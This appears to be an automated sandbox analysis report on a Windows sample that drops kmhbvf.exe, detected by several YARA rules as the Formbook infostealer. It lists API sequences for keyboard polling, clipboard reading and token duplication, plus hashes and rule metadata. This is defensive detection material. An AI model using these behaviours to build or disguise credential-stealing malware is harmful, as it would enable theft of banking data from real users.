          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 14:13:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: Cheertech CDNX-Cache-Status: MISSData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_00F30508
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405125
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00F44632
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00F5D164
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00F5D164

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_004063330_2_00406333
          Source: C:\Users\user\Desktop\shedfam.exeCode function: 0_2_004049360_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF33B71_2_00EF33B7
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00ED9C801_2_00ED9C80
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF23F51_2_00EF23F5
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F584001_2_00F58400
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F065021_2_00F06502
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EDE6F01_2_00EDE6F0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F0265E1_2_00F0265E
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF282A1_2_00EF282A
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F089BF1_2_00F089BF
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F06A741_2_00F06A74
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F50A3A1_2_00F50A3A
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EE0BE01_2_00EE0BE0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F2EDB21_2_00F2EDB2
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EFCD511_2_00EFCD51
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F50EB71_2_00F50EB7
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F38E441_2_00F38E44
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F06FE61_2_00F06FE6
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EDB0201_2_00EDB020
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00ED94E01_2_00ED94E0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EED45D1_2_00EED45D
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EFF4091_2_00EFF409
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EDF6A01_2_00EDF6A0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF16B41_2_00EF16B4
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00ED16631_2_00ED1663
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EEF6281_2_00EEF628
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF78C31_2_00EF78C3
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF1BA81_2_00EF1BA8
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EFDBA51_2_00EFDBA5
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F09CE51_2_00F09CE5
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EEDD281_2_00EEDD28
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EF1FC01_2_00EF1FC0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00EFBFD61_2_00EFBFD6
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_03AF02271_2_03AF0227
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_03AF04D81_2_03AF04D8
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041E81B2_2_0041E81B
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041DA1E2_2_0041DA1E
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041D5A62_2_0041D5A6
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041EF6B2_2_0041EF6B
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041DFC22_2_0041DFC2
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_0041E7982_2_0041E798
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EDB0202_2_00EDB020
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EFDBA52_2_00EFDBA5
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00ED94E02_2_00ED94E0
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00ED9C802_2_00ED9C80
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EED45D2_2_00EED45D
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00F584002_2_00F58400
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EFCD512_2_00EFCD51
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EEDD282_2_00EEDD28
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00F065022_2_00F06502
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EF16B42_2_00EF16B4
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00ED16632_2_00ED1663
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EEF6282_2_00EEF628
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00F06FE62_2_00F06FE6
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 2_2_00EFBFD62_2_00EFBFD6
          Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exeCode function: 1_2_00F28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00F28F2E
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\kmhbvf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
          Source: shedfam.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
